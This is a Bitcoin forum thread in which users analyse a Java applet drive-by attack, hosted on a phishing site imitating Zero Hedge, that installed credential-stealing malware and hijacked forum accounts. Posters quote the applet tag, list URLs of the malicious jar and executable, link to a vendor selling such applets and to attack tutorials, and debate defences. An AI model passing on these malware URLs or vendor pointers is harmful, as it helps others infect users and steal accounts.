Bitcoin Forum

The Java applet on this page is somehow being used to take control of forum accounts. Exactly how does this work? Is it a 0-day Java exploit, or some inherent security weakness in Java? Is there anything that can be done on my end to stop it?

(Proceed with caution) zerohedge.us/Mark-Zuckerberg-talks-about-Bitcoin.htm

Are you 100% sure it is from this page? Very recently I also visited this page and was close to allowing it to run (at the same time also being logged in to this forum) because I have visited that site frequently in the past and thought it was 'legit'. Fortunately I restrained myself from running it :P

I will give it a try on a vm, though not sure if it will work as it should.

That's not actually Zero Hedge. It's a phishing-type site.


No.

Normal java drive by, nothing else. Probably FUD

<html>
  <applet width='500' height='500' code="BitcoinMeet.class"' archive="BitcoinMeet.jar"> </applet>

</html>

edit: it's FUD https://www.virustotal.com/en/file/39b5ed1833ac72f79fb042f5fadf3c2352605b3c8cb58842114e77289f033cb8/analysis/1370635717/

and not normal one.. i have reported site in google safe browsing.

http://www.google.com/safebrowsing/report_badware/

Please report..^

Edit: It's downloading a file from here

Warning INFECTED FILE
https://v-panel.info/userAccounts/blackapples/AdobeUpdates DOT exe

Scan: 5/47
https://www.virustotal.com/en/file/79c4e1fa564ba5075fe15b6131202e16631cb1151708d337d2a0455bdbb882ab/analysis/1370636620/
https://malwr.com/analysis/YjAwYjE2MjIzN2Y1NDExYmIyOGRiYzcwZDBlODY0YjE/


You can see, https://v-panel.info/
this site provides these malicious java applets for 20$ only XD

more info about v-panel
http://www.hackforums.net/archive/index.php/thread-3413390.html
http://blackhatcrackers.blogspot.in/2013/05/java-drive-by-advanced.html

If nothing can be done on theymos side, probably the best thing to do is put up an alert system here to disable java for browsers and/or completely remove java. Because of javas screw ups, I've uninstalled that crap. Safer without it than with it.

It looks like Java applet downloading and launching the executable file. I cannot test is it 0-day exploit or "normal" behavior of Java because I have fortified my Firefox (java plugin disabled) but have not installed vmware machine with everything left at defaults.

Seems that the .exe is stealing either cookies or saved logins or keylogging passwords. Theymos cannot do nothing about it. The forum seems to be configured properly, the users computers and brains might not.

well 0day vulnerebilities are used in only costly exploit packs because they run exe silently,this one was a advance java drive by because it had exe file link in jar itself.

I can't say anything about exe because it seems like it has anti sandbox/antivm enabled, that's why it's not showing any outgoing connections.

0-day for Java usually are used to bypass the sandbox or code signature restrictions. Anyway I consider it to be a lame exploit because many don't have Java installed or enabled. Compared to let's say Flash Player who's 0-day exploit is likely to run code on almost every visitor.

I've dealt with ~10 people who seem to have fallen victim to this exploit, and many more will have had their accounts compromised without my knowledge. Looks like Java is fairly widespread, even in the Bitcoin community. If this exploit can be used on bigger and more important sites, it seems like a pretty major Java weakness.

PS: Here's the .jar file itself if I'm not wrong - http://zerohedge.us/BitcoinMeet.jar [WARNING VIRUS/TROJAN/]

Invalidate sessions if they come from a different IP range.

That is elementary to security, but it won't happen here because this forum supports TOR usage.

and vpn etc too.

Will not help. User will type password again and the .exe keylogger will intercept that password. Rest is obvious.

I'm more interested into looking at the .exe. For me the .jar seems only as a some sort of trojan-dowloader that fetches the exe from remote server and launches it.

There is nothing that forum owner can realistically  do if user machine is infected by malware.

The point would be to stop external logins. This of course, as you said, would not help *if* the infected computer was the one doing the controlling (remote control), and not just sending login credentials to an external site.

It will hurt Tor users because their IP changes constantly. It will not stop the hacker if the .exe opens socks proxy on infected computer (most new trojans does that). And even if it does not the hacker still can login from another IP when the victim are away.

This of course is the loophole to that solution. The person would literally need to DoS the forums by mashing F5 in order to keep another entity out (and in turns log themselves out in the process, giving a window of opportunity to the hacker).

Not really the best solution for a forum I suppose. PGP keys required for logging in might be smarter.

And exactly what prevents the malware from stealing PGP keys from computer and passphrase to unlock them? Even keys stored on smartcard are not bulletproof, the malware can intercept and modify the computer-smartcard communication. This will require additional programming but is not unrealistic.

The server's job is to keep forum accessible with proper credentials and keep the safe on server-side. User's job is to keep his computer secure. This malware is targeting the user and server cannot do anything about it.

Google 2FA + Invalidate session if ip or user agent changes (optional but activated by default).

This forum account is not that important to require two factor authorization. Most that one with the stolen account can do are posting Hello.jpg everywhere (and sometimes even original owner will do it) and social engineer other users.

report of AV scan: http://virusscan.jotti.org/en/scanresult/847cdfd36a7fd35514f569396916e78e60464ef5

We see how "efficient" the antivirus software are compared to technical knowledge.

And who makes antivirus called CP Secure? Antivirus for pedophiles?

java exploit? smug gnu/linux user not affected.jpg

funny

whois zerohedge.us

Billing Contact ID:                          EDD09205F595F517
Billing Contact Name:                        news manso
Billing Contact Organization:                sdgsdgsdg
Billing Contact Address1:                    dfhfdh
Billing Contact Address2:                    fdhhdfh
Billing Contact City:                        new york
Billing Contact State/Province:              NY
Billing Contact Postal Code:                 10001
Billing Contact Country:                     United States
Billing Contact Country Code:                US
Billing Contact Phone Number:                +1.987654321
Billing Contact Email:                       blackapples@yahoo.com



the root page is just an index of

'blackapples' is also in the .jar exploit code


however v-panel.info seems to be down

Something weird is going on this forum... Theymos needs to find more about it.

NIX are just as much affected. Java runs on Linux too. But the main payload .exe does not :DI feel weird too. Just smoked large bong with weed and something feels weird about this forum. Theymos must do something!